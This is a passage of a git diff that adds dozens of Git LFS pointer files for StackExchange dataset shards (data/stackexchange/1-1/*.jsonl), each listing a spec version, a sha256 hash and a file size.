--- /dev/null +++ b/data/stackexchange/1-1/1674_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3538bbe401e1375324310b1def18c60245219df04b5a2be3a660dacd298b6364 +size 35795297 diff --git a/data/stackexchange/1-1/1675_2289.jsonl b/data/stackexchange/1-1/1675_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..71f3a709670cea4658832bb3e523742180b6d707 --- /dev/null +++ b/data/stackexchange/1-1/1675_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d44572fb1d468091ef9eda0f0982aecd17197ea9e26a724d91933caee9a9860e +size 35223155 diff --git a/data/stackexchange/1-1/1676_2289.jsonl b/data/stackexchange/1-1/1676_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4c0e97702306d7644ab4fde2b6e49ad127ba8901 --- /dev/null +++ b/data/stackexchange/1-1/1676_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9bb5c3f5c0bd058f44286ce80b88ee3ef2f30df7609113c2be4c3bb9f052a5b6 +size 35532252 diff --git a/data/stackexchange/1-1/1677_2289.jsonl b/data/stackexchange/1-1/1677_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91727c971fc36d135b3419b802ebcb517064b389 --- /dev/null +++ b/data/stackexchange/1-1/1677_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:107f98cc1b83b382bc106857ebb9eb8261a0d4b9f3d964f4809f7b2c5eedf3c1 +size 34456636 diff --git a/data/stackexchange/1-1/1678_2289.jsonl b/data/stackexchange/1-1/1678_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a06b2b8b2db56199fc0b3b5c770b7400d913697 --- /dev/null +++ b/data/stackexchange/1-1/1678_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9468cd05a3b5eff8d52ebadef6ae48583b8a5a09760c1b01b89b800792debfa9 +size 35613267 diff --git a/data/stackexchange/1-1/1679_2289.jsonl b/data/stackexchange/1-1/1679_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ff78a17d54ac6c5f83b364a59e95e4561ac9b0c --- /dev/null +++ b/data/stackexchange/1-1/1679_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1460b84e0db8eb6147639b77bc0369ef3628cadc4678688dfdbcd1bc45e2210c +size 35546511 diff --git a/data/stackexchange/1-1/167_2289.jsonl b/data/stackexchange/1-1/167_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f253820de2da5d815cef34483cd44a0c01c0051 --- /dev/null +++ b/data/stackexchange/1-1/167_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:81282c336567c769fa05ceac660833a313992d5fa7eed77ec320055e35abdd81 +size 34265058 diff --git a/data/stackexchange/1-1/1680_2289.jsonl b/data/stackexchange/1-1/1680_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5da1e8d5815625aaeff99ccb2855123adc420a2 --- /dev/null +++ b/data/stackexchange/1-1/1680_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:18f221f8385573b4c19c2ac652b99a07bb05c6490050a77e9669d6697d2db710 +size 35080460 diff --git a/data/stackexchange/1-1/1681_2289.jsonl b/data/stackexchange/1-1/1681_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f25a2fd784143b7d882f432041c2db2a220a5e39 --- /dev/null +++ b/data/stackexchange/1-1/1681_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f58b67239f10cf56dbab7e0bee598f7acfdb198f71f97f2419841a2e2a5c98a +size 35736025 diff --git a/data/stackexchange/1-1/1682_2289.jsonl b/data/stackexchange/1-1/1682_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..166974dab5e477b3f15891fd98bded3c3027ef14 --- /dev/null +++ b/data/stackexchange/1-1/1682_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d79bedab4d4f3510a6203e325d4145a36b34759bac9bd6945c8faffbd2abbcc5 +size 35791782 diff --git a/data/stackexchange/1-1/1683_2289.jsonl b/data/stackexchange/1-1/1683_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..408f131113b5c985756e7a6096c046f351e75993 --- /dev/null +++ b/data/stackexchange/1-1/1683_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32da41e73372a6064a7177eb5efc7a84a549089033981acb9a2d81e89ffbc302 +size 35635217 diff --git a/data/stackexchange/1-1/1684_2289.jsonl b/data/stackexchange/1-1/1684_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c70c732e10575f93a7c933a085c13d52ca37dcef --- /dev/null +++ b/data/stackexchange/1-1/1684_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17927d34bc7080ebda949d60aabaffe988704c7261659a2cddabb46e5cfdf727 +size 35163418 diff --git a/data/stackexchange/1-1/1685_2289.jsonl b/data/stackexchange/1-1/1685_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..423395e70eaced889ef7a1b2c2f188f1dce04701 --- /dev/null +++ b/data/stackexchange/1-1/1685_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:093f18304d486882000c82401aabc0ccaed4d5dffbc4ce7ffa2b6b7bb45b5fae +size 35047748 diff --git a/data/stackexchange/1-1/1686_2289.jsonl b/data/stackexchange/1-1/1686_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5614258e526565ca8f27b1d1fa8f0acbcf2d0f2 --- /dev/null +++ b/data/stackexchange/1-1/1686_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e3fbf110be3dc9c92217073666cee668ff780cedbc7c4f2c144c654626657917 +size 35477787 diff --git a/data/stackexchange/1-1/1687_2289.jsonl b/data/stackexchange/1-1/1687_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b727dce6fe79b837df042c37de2ba3723cbbb3aa --- /dev/null +++ b/data/stackexchange/1-1/1687_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff22bcd8b1d3dcf159f4b00304f7399ed171e357f08ede55f1d2c261acaf563c +size 35312597 diff --git a/data/stackexchange/1-1/1688_2289.jsonl b/data/stackexchange/1-1/1688_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e551977de7f53296600383a6a072e96beb77300f --- /dev/null +++ b/data/stackexchange/1-1/1688_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d7329eaaafb191041ffb4e013fd1493ff23ff094be0f8057ead857868efec38 +size 34870101 diff --git a/data/stackexchange/1-1/1689_2289.jsonl b/data/stackexchange/1-1/1689_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7d1e5eef1404ca61e6d472a5c62171586370b0c1 --- /dev/null +++ b/data/stackexchange/1-1/1689_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d642304e41cf34c8208695b3d2a0f5a19566ef370218dcf7aa73ea538aefe383 +size 35541394 diff --git a/data/stackexchange/1-1/168_2289.jsonl b/data/stackexchange/1-1/168_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f54429d2b5aa7ad89cbc802c1140ef7f5f57cb2 --- /dev/null +++ b/data/stackexchange/1-1/168_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b19b1d0f98a995c979790b0194f69dbf598820a943a67778e4b268c3df57193 +size 35177607 diff --git a/data/stackexchange/1-1/1690_2289.jsonl b/data/stackexchange/1-1/1690_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95ff9dc902c65ac28672662187d2e90ca3289509 --- /dev/null +++ b/data/stackexchange/1-1/1690_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:84993aa232a8b6d4ef0f7a0ae758e28379ceee0fc9a6919d9642a095a1960c0b +size 36089158 diff --git a/data/stackexchange/1-1/1691_2289.jsonl b/data/stackexchange/1-1/1691_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eff4f7c62b947dd9dfb927dd848a160b728f163d --- /dev/null +++ b/data/stackexchange/1-1/1691_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:767cf4a06e96dfad4333cd68c307781ce49d5280be856b298a7e81807927e786 +size 35496431 diff --git a/data/stackexchange/1-1/1692_2289.jsonl b/data/stackexchange/1-1/1692_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de6154918ff18f4acea8963e2f3fe0737d717f48 --- /dev/null +++ b/data/stackexchange/1-1/1692_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:093dbc8c5c7fed4bef2322d219fd70a865e99b7859d9928324e8a80a9eb05ae0 +size 35780216 diff --git a/data/stackexchange/1-1/1693_2289.jsonl b/data/stackexchange/1-1/1693_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0af6568ff9e3093c44df6700f33422011cb70ec2 --- /dev/null +++ b/data/stackexchange/1-1/1693_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48b4eeb78f5476b1cda6f28216afff292305356089e75fd55395891ed3f0ad61 +size 35284510 diff --git a/data/stackexchange/1-1/1694_2289.jsonl b/data/stackexchange/1-1/1694_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c1b30f56673c746f4fa8f4dc036b6f36f6aeffe3 --- /dev/null +++ b/data/stackexchange/1-1/1694_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e008cc21915605e79bf561a449d6922b80d19303a3cd950ef3532634fa91bd4 +size 35645545 diff --git a/data/stackexchange/1-1/1695_2289.jsonl b/data/stackexchange/1-1/1695_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ccc9f7c3d3c62df51b93d3fa29b15b038df4a56 --- /dev/null +++ b/data/stackexchange/1-1/1695_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:570b5b6d89b24d021d0d9882fd755fe416b48d3c599f45c756a97936c938d1d1 +size 35351400 diff --git a/data/stackexchange/1-1/1696_2289.jsonl b/data/stackexchange/1-1/1696_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..16c2b7aaa2320c531969aaedf33911f39e56afb3 --- /dev/null +++ b/data/stackexchange/1-1/1696_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d968a8b9d58e1ed2fb323984f26d687078dc4ff2e9b383fe83c0b73072a7689c +size 35310316 diff --git a/data/stackexchange/1-1/1697_2289.jsonl b/data/stackexchange/1-1/1697_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eeedcc54b5714e45102c5209c183a047dd4cf652 --- /dev/null +++ b/data/stackexchange/1-1/1697_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a34f3bc38026f95bbcfb00434cba87cdd01c2da2737e8e01db8c78c9d9cf9218 +size 35467657 diff --git a/data/stackexchange/1-1/1698_2289.jsonl b/data/stackexchange/1-1/1698_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ce41b36e355e2cfdc936db22e5affc8a8bb002db --- /dev/null +++ b/data/stackexchange/1-1/1698_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:69bc6964d7ce6278e118c53f34d683e5653ca44128c1c9ffa7f90e0d72221fd4 +size 35317979 diff --git a/data/stackexchange/1-1/1699_2289.jsonl b/data/stackexchange/1-1/1699_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75d66b4699be86221aeeeee15974149e09f44520 --- /dev/null +++ b/data/stackexchange/1-1/1699_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c7fbeaf7327d0bc33a8d5f2999c372890b98b97c472e9818a6b3efdf583a18e +size 35460905 diff --git a/data/stackexchange/1-1/169_2289.jsonl b/data/stackexchange/1-1/169_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7298606bfc226885f8b75dc23b1cdda22d03c235 --- /dev/null +++ b/data/stackexchange/1-1/169_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1a00c1d3eef022f05d780ab734ac5c282ed5d26eb4f44c9cc40d0a3c4e60466 +size 34637198 diff --git a/data/stackexchange/1-1/16_2289.jsonl b/data/stackexchange/1-1/16_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e00cef1b403182b17e2cbd22e1d9038fed4605e8 --- /dev/null +++ b/data/stackexchange/1-1/16_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cebc55f1863f468cd9707bc71d99c22c1cda2797dd73512e8cb1e88b243a211b +size 36493987 diff --git a/data/stackexchange/1-1/1700_2289.jsonl b/data/stackexchange/1-1/1700_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c4c1fce94650d3fc356edc20a07bbf5f85fa871 --- /dev/null +++ b/data/stackexchange/1-1/1700_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:296a4fa04f69f0094644ea67aa107a1fda8859288122c7897a7377b57b079d28 +size 35775665 diff --git a/data/stackexchange/1-1/1701_2289.jsonl b/data/stackexchange/1-1/1701_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b54a5384302b570b347f1c72099b1e13d0a9d7c --- /dev/null +++ b/data/stackexchange/1-1/1701_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ce88576f302fd051650024ff076fc97934655c7ba541493bfc10bffcf4d80b7 +size 36090465 diff --git a/data/stackexchange/1-1/1702_2289.jsonl b/data/stackexchange/1-1/1702_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f67c22fa876ddc1edae242684cc09c659626f23 --- /dev/null +++ b/data/stackexchange/1-1/1702_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30b234f371b8fc2327c949e61fbbb4e3df59a0b80e4ef9d9eecb9f88f3e75fe9 +size 35629557 diff --git a/data/stackexchange/1-1/1703_2289.jsonl b/data/stackexchange/1-1/1703_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..812530555153166e9686c7148451311f93e2bb5b --- /dev/null +++ b/data/stackexchange/1-1/1703_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8645d6e346e2fa04effac47eea9e473d8baa2cdfcfd5a0ae8676cb2b55c6fc32 +size 35333483 diff --git a/data/stackexchange/1-1/1704_2289.jsonl b/data/stackexchange/1-1/1704_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1482fd2e4821bcc2cbb14632cd6dd755e29bbf9d --- /dev/null +++ b/data/stackexchange/1-1/1704_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da78d18f5b6dae27826576c42dde2205e612645ac1cb5695e07080dc80ae4903 +size 35916723 diff --git a/data/stackexchange/1-1/1705_2289.jsonl b/data/stackexchange/1-1/1705_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a6bcd6e108af083722b8e692f05ebfbe3f101c73 --- /dev/null +++ b/data/stackexchange/1-1/1705_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1691cf50a6a735b207befcc3f788a57bd1aee85ee43032e4be00dd26ba5b919d +size 36091953 diff --git a/data/stackexchange/1-1/1706_2289.jsonl b/data/stackexchange/1-1/1706_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7667989d3ce5ac2477f55596037bdcec1bfdabc0 --- /dev/null +++ b/data/stackexchange/1-1/1706_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d51e5b3b4975177e215c038e94cfddc242295717f02cbd0896fcc4e3e8685ce +size 35225228 diff --git a/data/stackexchange/1-1/1707_2289.jsonl b/data/stackexchange/1-1/1707_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18e41d160681c4862890b1b50d383b58470c67b0 --- /dev/null +++ b/data/stackexchange/1-1/1707_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6eb6fa996a84f040f6f3086b39b9577e28c19a287ea56782b33f518332641673 +size 35362912 diff --git a/data/stackexchange/1-1/1708_2289.jsonl b/data/stackexchange/1-1/1708_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78ff9f65439f1f73f31692f2b432e8b1b65487de --- /dev/null +++ b/data/stackexchange/1-1/1708_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ef705fcb241bae3577426a8e9c1d67e79a29463cbf23237597930aa33405569 +size 36080153 diff --git a/data/stackexchange/1-1/1709_2289.jsonl b/data/stackexchange/1-1/1709_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b2f2d7e47cd236a6371deba3b6e82f7fc7b6993 --- /dev/null +++ b/data/stackexchange/1-1/1709_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dbc667b18f9e2190b60b326e7378f3ce98c6f9b63ab0ecdeaad3ce5dbbba848b +size 35703290 diff --git a/data/stackexchange/1-1/170_2289.jsonl b/data/stackexchange/1-1/170_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83e71e519b36bbaa87edd34e7a5c5111fa19c2f1 --- /dev/null +++ b/data/stackexchange/1-1/170_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:60748806547a1c34850f471ed7d475f1ee5667553fbda2f984de900e135b58f4 +size 35590734 diff --git a/data/stackexchange/1-1/1710_2289.jsonl b/data/stackexchange/1-1/1710_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0084eefd65fcea113e1051f0b5f1380f53618037 --- /dev/null +++ b/data/stackexchange/1-1/1710_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1e944fa51d7c1f67b329faada239246e737f146a4f701b21a02d7e4a1f8c582 +size 35550988 diff --git a/data/stackexchange/1-1/1711_2289.jsonl b/data/stackexchange/1-1/1711_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0ca77148ce937a7bffb9ab4586c8edf56111439 --- /dev/null +++ b/data/stackexchange/1-1/1711_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b5ee26c64a934416f8f6aac356c45edcdbc438c1afd1884c59f35092072fe23 +size 35704893 diff --git a/data/stackexchange/1-1/1712_2289.jsonl b/data/stackexchange/1-1/1712_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd0ea7968f0fd35f506c21fb894bccc26fec12d3 --- /dev/null +++ b/data/stackexchange/1-1/1712_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:991dcdc04f86f9297b3d1cb9a9807d38c207edd308f1a1c5a4fc7a7c021a14a7 +size 35583735 diff --git a/data/stackexchange/1-1/1713_2289.jsonl b/data/stackexchange/1-1/1713_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6cc3a4695a12133e3133cca462c1585e586ca4c4 --- /dev/null +++ b/data/stackexchange/1-1/1713_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc2324b20bc31db2cd338ef4b09fb9c10e9c08815302b2200de7c936e99e2a38 +size 35893332 diff --git a/data/stackexchange/1-1/1714_2289.jsonl b/data/stackexchange/1-1/1714_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..752866f7c3e5464189cdc44ae36e8d04ce46eaa4 --- /dev/null +++ b/data/stackexchange/1-1/1714_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b37e73667fbd1dae26fa062f2ea7f169159ca32886c9f47b9530b33e545e6515 +size 35535003 diff --git a/data/stackexchange/1-1/1715_2289.jsonl b/data/stackexchange/1-1/1715_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40d0bf2bd03129c0d0e459d84daf156a63902641 --- /dev/null +++ b/data/stackexchange/1-1/1715_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd7add67a8e39ef2ad6db05247871be709e2ccd469321c80220f45d951ff442d +size 35796263 diff --git a/data/stackexchange/1-1/1716_2289.jsonl b/data/stackexchange/1-1/1716_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..be00410f6636b4e7278499fb9fe7ce68f6206f16 --- /dev/null +++ b/data/stackexchange/1-1/1716_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9ef4e06acf88300f763746ed0b98e7f705a0b859d234d449488ab2f9bf9ad40 +size 35736502 diff --git a/data/stackexchange/1-1/1717_2289.jsonl b/data/stackexchange/1-1/1717_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..86cc112719505a1da9d48c89e0075ffdee41c31f --- /dev/null +++ b/data/stackexchange/1-1/1717_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:139e3e827e8838fb3fe966502f9e829e33f633f26cc369ad42ea15ee693adc43 +size 35686676 diff --git a/data/stackexchange/1-1/1718_2289.jsonl b/data/stackexchange/1-1/1718_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a6ba75b78fff58655fe820190dab05574240135c --- /dev/null +++ b/data/stackexchange/1-1/1718_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc54663a71c8f685c48e8708c975c353640dff81363236b84d18dc3f43bf592c +size 35711628 diff --git a/data/stackexchange/1-1/1719_2289.jsonl b/data/stackexchange/1-1/1719_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f92df73729f6c64639d5a080199e27d8e75c9aaa --- /dev/null +++ b/data/stackexchange/1-1/1719_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c66939fe108c03dc139c8c26f0bf7020c70b2a848923115abd349fab0c6a7de2 +size 34718220 diff --git a/data/stackexchange/1-1/171_2289.jsonl b/data/stackexchange/1-1/171_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14058206cf7d9b4724013eafe19276538dc2649f --- /dev/null +++ b/data/stackexchange/1-1/171_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b76d8dbd74816e8838bf699cd4179a71bb0fee9c1a9b280f125f2fbf2bbe7279 +size 34662934 diff --git a/data/stackexchange/1-1/1720_2289.jsonl b/data/stackexchange/1-1/1720_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a51976d3ed52487f3c58a1972844bb1e7a1b0e0 --- /dev/null +++ b/data/stackexchange/1-1/1720_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:08c28ed72a90d3a934d3da279f943d1ccdebfeac9080aa12b6d282a46e12e25e +size 34954363 diff --git a/data/stackexchange/1-1/1721_2289.jsonl b/data/stackexchange/1-1/1721_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..523b52b6f033f2a60f60e1ec7aa067e074baf99f --- /dev/null +++ b/data/stackexchange/1-1/1721_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5cdaab90734c87e35db336c6a7ec8e272a482e016fa45ed704295f255c6df42 +size 35629438 diff --git a/data/stackexchange/1-1/1722_2289.jsonl b/data/stackexchange/1-1/1722_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a5c64bd662c4a6945dc2bc12bd7859ce2b5d140 --- /dev/null +++ b/data/stackexchange/1-1/1722_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4fbc42e36cebc3b21df3b6f39a309370fe0cecb261dfa2f68d90feaed42b7ca0 +size 35018861 diff --git a/data/stackexchange/1-1/1723_2289.jsonl b/data/stackexchange/1-1/1723_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b156434a269ef0acc19aa9d0cd0ebcf844b95046 --- /dev/null +++ b/data/stackexchange/1-1/1723_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e770a425122acf1a06c8914c4611af359dec3752a6c8a26e5293ba40b955085c +size 35618435 diff --git a/data/stackexchange/1-1/1724_2289.jsonl b/data/stackexchange/1-1/1724_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8373c34460882d5ef18683f88c0bec5a171c709f --- /dev/null +++ b/data/stackexchange/1-1/1724_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:118e76e80f571ca5fb0dbef04206780952cd931186f5f05785eb071cd8f8e101 +size 35199907 diff --git a/data/stackexchange/1-1/1725_2289.jsonl b/data/stackexchange/1-1/1725_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28ba3e2501434a67e341d396126377e03a6319d1 --- /dev/null +++ b/data/stackexchange/1-1/1725_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e04bd5a792d5a94845500e8b8e3fedd43ca06544decfa3e46382b4c3e3473dbe +size 35942475 diff --git a/data/stackexchange/1-1/1726_2289.jsonl b/data/stackexchange/1-1/1726_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e208538b134b3ae78b4a11a7fd99dcd3916cb726 --- /dev/null +++ b/data/stackexchange/1-1/1726_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:527d72fbd5487825b75d9beaff16cd0d61ce7d8436c8250d116d9a278646d8f2 +size 35726357 diff --git a/data/stackexchange/1-1/1727_2289.jsonl b/data/stackexchange/1-1/1727_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d19d55753f244d0d32e0631d40ec94e11852fe6e --- /dev/null +++ b/data/stackexchange/1-1/1727_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d64e6af9eef0961632517a62248309c8659e68f7666bf74ebca18b00ab9f7734 +size 35357525 diff --git a/data/stackexchange/1-1/1728_2289.jsonl b/data/stackexchange/1-1/1728_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e35d69fdb729ae12e645fa37bd38f1dd337bc74a --- /dev/null +++ b/data/stackexchange/1-1/1728_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c57f67878d2d53e932c7912fafcdafd27765b27954969bf97878d843f42cf694 +size 35419353 diff --git a/data/stackexchange/1-1/1729_2289.jsonl b/data/stackexchange/1-1/1729_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8745c53c1e7ea45b755b5341fb8f4331f6325e4a --- /dev/null +++ b/data/stackexchange/1-1/1729_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd12f4390ccd2f168ed92374bbc0147bb037aed85f9a8312cadb6fe312f82a86 +size 35452269 diff --git a/data/stackexchange/1-1/172_2289.jsonl b/data/stackexchange/1-1/172_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..af4f3e922fdcf5bb28f0e56f24fa4cbd367a58f0 --- /dev/null +++ b/data/stackexchange/1-1/172_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f84e7c3a9344ef8316b3499e45df9d8afcb51c3cbf8a17ceab9524a9e75f577 +size 34744065 diff --git a/data/stackexchange/1-1/1730_2289.jsonl b/data/stackexchange/1-1/1730_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5e395f247b15024fe443e238c944b276156544b --- /dev/null +++ b/data/stackexchange/1-1/1730_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2c0c8881506d42260225025a21fe7b433f1738d09ff80ac8b8242eaad981b094 +size 35491077 diff --git a/data/stackexchange/1-1/1731_2289.jsonl b/data/stackexchange/1-1/1731_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..218c6a94704b9d29f4422e46e7e40f3741e746e2 --- /dev/null +++ b/data/stackexchange/1-1/1731_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d20d9a28c1916b4717deb23a6e28a1f87ffe1e577cb2b1cee5bc3f55f275c10a +size 35603684 diff --git a/data/stackexchange/1-1/1732_2289.jsonl b/data/stackexchange/1-1/1732_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a934f9da22a4e68c522c7927f952308067d2bc16 --- /dev/null +++ b/data/stackexchange/1-1/1732_2289.jsonl @@ -0,0 +1,3 @@ +version 